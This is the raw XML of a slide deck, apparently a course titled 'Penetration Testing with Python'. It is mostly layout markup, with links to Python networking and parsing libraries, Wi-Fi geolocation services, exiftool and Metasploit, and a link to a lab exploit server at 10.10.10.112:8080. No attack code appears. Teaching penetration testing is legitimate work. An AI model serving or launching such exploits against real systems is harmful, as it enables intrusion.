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Lst>
  <p:sldSz cy="6858000" cx="12192000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Russo One"/>
      <p:regular r:id="rId1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71" roundtripDataSignature="AMtx7miOyEjRgpoP4GrYawpiR2wQldsu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171" Type="http://customschemas.google.com/relationships/presentationmetadata" Target="metadata"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide63.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RussoOne-regular.fntdata"/><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e9adf94182_2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1e9adf94182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e9a65c21fa_51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7" name="Google Shape;817;g1e9a65c21fa_5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e9a65c21fa_51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3" name="Google Shape;823;g1e9a65c21fa_51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e9a65c21fa_51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9" name="Google Shape;829;g1e9a65c21fa_51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e9a65c21fa_51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6" name="Google Shape;836;g1e9a65c21fa_51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2" name="Google Shape;84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fe188b01e2_0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8" name="Google Shape;848;g1fe188b01e2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fe188b01e2_0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4" name="Google Shape;854;g1fe188b01e2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fe188b01e2_0_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0" name="Google Shape;860;g1fe188b01e2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fe188b01e2_0_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6" name="Google Shape;866;g1fe188b01e2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2" name="Google Shape;8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9adf94182_2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1e9adf94182_2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9" name="Google Shape;87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6" name="Google Shape;8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5" name="Google Shape;89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2" name="Google Shape;90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9" name="Google Shape;90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6" name="Google Shape;91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3" name="Google Shape;92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0" name="Google Shape;93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7" name="Google Shape;93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4" name="Google Shape;94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e9adf94182_2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1e9adf94182_2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1" name="Google Shape;95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8" name="Google Shape;95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5" name="Google Shape;96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073b6da4c1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2" name="Google Shape;972;g2073b6da4c1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073b6da4c1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9" name="Google Shape;979;g2073b6da4c1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2073b6da4c1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6" name="Google Shape;986;g2073b6da4c1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3" name="Google Shape;99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0" name="Google Shape;100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7" name="Google Shape;100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5" name="Google Shape;101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e9adf94182_2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1e9adf94182_2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2073b6da4c1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2" name="Google Shape;1022;g2073b6da4c1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073b6da4c1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9" name="Google Shape;1029;g2073b6da4c1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2073b6da4c1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6" name="Google Shape;1036;g2073b6da4c1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3" name="Google Shape;104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0" name="Google Shape;105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7" name="Google Shape;1057;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4" name="Google Shape;1064;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1" name="Google Shape;1071;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8" name="Google Shape;1078;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5" name="Google Shape;1085;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e9adf94182_2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1e9adf94182_2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2" name="Google Shape;1092;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9" name="Google Shape;1099;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6" name="Google Shape;1106;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3" name="Google Shape;111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7" name="Google Shape;1127;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4" name="Google Shape;1134;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1" name="Google Shape;1141;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8" name="Google Shape;1148;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5" name="Google Shape;1155;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9adf94182_2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1e9adf94182_2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2" name="Google Shape;1162;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9" name="Google Shape;1169;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6" name="Google Shape;1176;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3" name="Google Shape;1183;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0" name="Google Shape;1190;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8" name="Google Shape;1198;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5" name="Google Shape;1205;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2" name="Google Shape;1212;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9" name="Google Shape;1219;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6" name="Google Shape;1226;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3" name="Google Shape;1233;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0" name="Google Shape;1240;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7" name="Google Shape;1247;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4" name="Google Shape;1254;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1" name="Google Shape;126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a79f84f46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g1fa79f84f46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fa79f84f46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g1fa79f84f4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9adf94182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1e9adf94182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9adf94182_7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1e9adf94182_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e9adf94182_1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g1e9adf94182_1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fa8498ff28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g1fa8498ff28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e9adf94182_17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g1e9adf94182_1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f87e02411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1f87e02411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g1f87e024115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e9adf94182_2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1e9adf94182_2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e9adf94182_2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1e9adf94182_2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fa8498ff28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g1fa8498ff28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fa8498ff28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g1fa8498ff2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e9a65c21fa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g1e9a65c21fa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e9a65c21fa_1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1e9a65c21fa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e9a65c21fa_1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g1e9a65c21fa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e9a65c21fa_1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g1e9a65c21fa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e9a65c21fa_1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g1e9a65c21fa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e9a65c21fa_1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g1e9a65c21fa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e9a65c21fa_1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g1e9a65c21fa_1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9adf94182_2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1e9adf94182_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e9a65c21fa_1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g1e9a65c21fa_1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e9a65c21fa_6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g1e9a65c21fa_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e9a65c21fa_6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g1e9a65c21fa_6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f87e02411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g1f87e024115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g1f87e024115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fa93aff712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g1fa93aff712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fa93aff712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g1fa93aff71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fa93aff712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g1fa93aff712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9adf94182_2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1e9adf94182_2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e9a65c21fa_16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g1e9a65c21fa_1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e9a65c21fa_16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3" name="Google Shape;513;g1e9a65c21fa_16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e9a65c21fa_16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g1e9a65c21fa_16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e9a65c21fa_2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2" name="Google Shape;532;g1e9a65c21fa_2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e9a65c21fa_21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8" name="Google Shape;538;g1e9a65c21fa_2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e9a65c21fa_21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5" name="Google Shape;545;g1e9a65c21fa_2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1" name="Google Shape;55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fe188b01e2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g1fe188b01e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fe188b01e2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3" name="Google Shape;563;g1fe188b01e2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9adf94182_2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e9adf94182_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e9a65c21fa_26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9" name="Google Shape;569;g1e9a65c21fa_2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e9a65c21fa_26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5" name="Google Shape;575;g1e9a65c21fa_26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e9a65c21fa_26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2" name="Google Shape;582;g1e9a65c21fa_26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e9a65c21fa_26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8" name="Google Shape;588;g1e9a65c21fa_26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4" name="Google Shape;59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fe188b01e2_0_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0" name="Google Shape;600;g1fe188b01e2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e9a65c21fa_3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g1e9a65c21fa_3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e9a65c21fa_31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2" name="Google Shape;612;g1e9a65c21fa_3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e9a65c21fa_31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9" name="Google Shape;619;g1e9a65c21fa_3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5" name="Google Shape;62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9adf94182_2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1e9adf94182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fe188b01e2_0_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1" name="Google Shape;631;g1fe188b01e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073b6da4c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g2073b6da4c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073b6da4c1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3" name="Google Shape;643;g2073b6da4c1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073b6da4c1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0" name="Google Shape;650;g2073b6da4c1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073b6da4c1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6" name="Google Shape;656;g2073b6da4c1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073b6da4c1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2" name="Google Shape;662;g2073b6da4c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073b6da4c1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8" name="Google Shape;668;g2073b6da4c1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073b6da4c1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4" name="Google Shape;674;g2073b6da4c1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073b6da4c1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0" name="Google Shape;680;g2073b6da4c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073b6da4c1_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6" name="Google Shape;686;g2073b6da4c1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9adf94182_2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1e9adf94182_2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073b6da4c1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2" name="Google Shape;692;g2073b6da4c1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e9a65c21fa_36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8" name="Google Shape;698;g1e9a65c21fa_3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e9a65c21fa_36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4" name="Google Shape;704;g1e9a65c21fa_36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e9a65c21fa_36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1" name="Google Shape;711;g1e9a65c21fa_36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e9a65c21fa_4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7" name="Google Shape;717;g1e9a65c21fa_4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e9a65c21fa_41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3" name="Google Shape;723;g1e9a65c21fa_4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e9a65c21fa_41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0" name="Google Shape;730;g1e9a65c21fa_4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e9a65c21fa_46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6" name="Google Shape;736;g1e9a65c21fa_4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e9a65c21fa_46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2" name="Google Shape;742;g1e9a65c21fa_46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9" name="Google Shape;74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9adf94182_2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1e9adf94182_2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fe188b01e2_0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5" name="Google Shape;755;g1fe188b01e2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fe188b01e2_0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1" name="Google Shape;761;g1fe188b01e2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fe188b01e2_0_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7" name="Google Shape;767;g1fe188b01e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fe188b01e2_0_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3" name="Google Shape;773;g1fe188b01e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fe188b01e2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9" name="Google Shape;779;g1fe188b01e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e9a65c21fa_5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5" name="Google Shape;785;g1e9a65c21fa_5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e9a65c21fa_51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1" name="Google Shape;791;g1e9a65c21fa_5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e9a65c21fa_51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8" name="Google Shape;798;g1e9a65c21fa_5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e9a65c21fa_51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4" name="Google Shape;804;g1e9a65c21fa_5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e9a65c21fa_51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0" name="Google Shape;810;g1e9a65c21fa_5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pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="18" name="Google Shape;18;p42"/>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9" name="Google Shape;19;p42"/>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20" name="Google Shape;20;p42"/>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2"/>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2"/>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Verdana"/>
              <a:buNone/>
              <a:defRPr sz="5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2"/>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atin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>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4" name="Google Shape;24;p4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6" name="Shape 116"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="117" name="Google Shape;117;p5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8" name="Google Shape;118;p5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9" name="Google Shape;119;p5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1"/>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Verdana"/>
              <a:buNone/>
              <a:defRPr sz="32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51"/>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3" name="Google Shape;123;p5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1"/>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6" name="Shape 126"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="127" name="Google Shape;127;p5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8" name="Google Shape;128;p5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9" name="Google Shape;129;p5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2"/>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52"/>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3" name="Google Shape;133;p52"/>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4" name="Google Shape;134;p5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5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52"/>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
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p52"/>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
        <p:nvSpPr>
          <p:cNvPr id="138" name="Google Shape;138;p52"/>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7200"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US"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9" name="Shape 139"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="140" name="Google Shape;140;p5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1" name="Google Shape;141;p5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2" name="Google Shape;142;p5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3"/>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Verdana"/>
              <a:buNone/>
              <a:defRPr sz="32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53"/>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6" name="Google Shape;146;p5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5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53"/>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9" name="Shape 149"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="150" name="Google Shape;150;p5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1" name="Google Shape;151;p5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2" name="Google Shape;152;p5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4"/>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54"/>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54"/>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54"/>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54"/>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54"/>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0" name="Google Shape;160;p54"/>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1" name="Google Shape;161;p5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5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164" name="Google Shape;164;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10585825" y="609600"/>
            <a:ext cx="1602998" cy="136064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5" name="Shape 165"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="166" name="Google Shape;166;p5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7" name="Google Shape;167;p5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8" name="Google Shape;168;p5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5"/>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Verdana"/>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55"/>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55"/>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73" name="Google Shape;173;p55"/>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55"/>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55"/>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76" name="Google Shape;176;p55"/>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55"/>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8" name="Google Shape;178;p55"/>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79" name="Google Shape;179;p55"/>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atin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:defRPr>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0" name="Google Shape;180;p5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5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5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pic>
        <p:nvPicPr>
          <p:cNvPr id="183" name="Google Shape;183;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10585825" y="609600"/>
            <a:ext cx="1602998" cy="136064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4" name="Shape 184"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="185" name="Google Shape;185;p5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5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5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Verdana"/>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56"/>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a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-355600" lvl="1" marL="914400" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-342900" lvl="2" marL="1371600" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-330200" lvl="3" marL="1828800" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-330200" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>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5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5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5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pic>
        <p:nvPicPr>
          <p:cNvPr id="194" name="Google Shape;194;p56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10585825" y="609600"/>
            <a:ext cx="1602998" cy="13606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pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="28" name="Google Shape;28;p4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9" name="Google Shape;29;p4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0" name="Google Shape;30;p4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Font typeface="Russo One"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo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4" name="Google Shape;34;p4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37" name="Google Shape;37;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10585825" y="609600"/>
            <a:ext cx="1602998" cy="13606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pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="39" name="Google Shape;39;p4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0" name="Google Shape;40;p4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1" name="Google Shape;41;p4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Font typeface="Russo One"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo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47" name="Google Shape;47;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10585825" y="609600"/>
            <a:ext cx="1602998" cy="136064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pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowShort.png" id="49" name="Google Shape;49;p45"/>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50" name="Google Shape;50;p4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54" name="Google Shape;54;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10585825" y="609600"/>
            <a:ext cx="1602998" cy="13606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pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="56" name="Google Shape;56;p4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7" name="Google Shape;57;p4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8" name="Google Shape;58;p4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Font typeface="Russo One"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo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6"/>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2" name="Google Shape;62;p46"/>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4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66" name="Google Shape;66;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10585825" y="609600"/>
            <a:ext cx="1602998" cy="136064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pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="68" name="Google Shape;68;p4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9" name="Google Shape;69;p4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0" name="Google Shape;70;p4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7"/>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7"/>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4" name="Google Shape;74;p47"/>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47"/>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6" name="Google Shape;76;p47"/>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4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80" name="Google Shape;80;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10585825" y="609600"/>
            <a:ext cx="1602998" cy="136064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pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="82" name="Google Shape;82;p4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4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4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8"/>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8"/>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48"/>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4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92" name="Google Shape;92;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10585825" y="609600"/>
            <a:ext cx="1602998" cy="136064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pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="94" name="Google Shape;94;p4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5" name="Google Shape;95;p4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6" name="Google Shape;96;p4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9"/>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9"/>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000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p49"/>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1" name="Google Shape;101;p4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104" name="Google Shape;104;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10585825" y="609600"/>
            <a:ext cx="1602998" cy="136064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5" name="Shape 105"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="HD-ShadowLong.png" id="106" name="Google Shape;106;p5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7" name="Google Shape;107;p5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8" name="Google Shape;108;p5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0"/>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50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680322" y="609597"/>
            <a:ext cx="9613859" cy="3589575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="76200" rotWithShape="0" algn="tl" dir="5040000" dist="63500">
              <a:srgbClr val="000000">
                <a:alpha val="40000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Google Shape;112;p50"/>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3" name="Google Shape;113;p5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5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50"/>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9" name="Shape 9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="hashOverlay-FullResolve.png" id="10" name="Google Shape;10;p41"/>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4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4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4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4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4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pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Google Shape;16;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10729455" y="753227"/>
            <a:ext cx="1433788" cy="121701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realpython.com/python-sockets/"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1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1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hyperlink" Target="http://wigle.net/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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hyperlink" Target="http://www.skyhookwireless.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.google.com/p/maclocate/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://github.com/iancmcc/maclocate" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1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1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hyperlink" Target="http://www.search.sourceforge.net/mechanize/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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10.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python.org/3/library/optparse.html#module-optparse" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/3/library/argparse.html#module-argparse"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10.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10.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10.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10.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1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10.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hyperlink" Target="https://pypi.org/project/pypdf/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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10.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12.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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hyperlink" Target="http://www.sno.phy.queensu.ca/~phil/exiftool/" TargetMode="Externa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10.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10.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image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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image" Target="../media/image10.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image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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about:blank"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pexpect.sourceforge.ne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pexpect.sourceforge.ne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pexpect.sourceforge.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10.10.10.112:8080/exploit"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10.10.10.112:8080/exploit"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hyperlink" Target="http://metasploit.com/download/"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syngress.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
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="262975" y="3123725"/>
            <a:ext cx="8420100" cy="1373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2400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600">
                <a:latin typeface="Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>PENETRATION TESTING WITH PYTHON</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo One"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
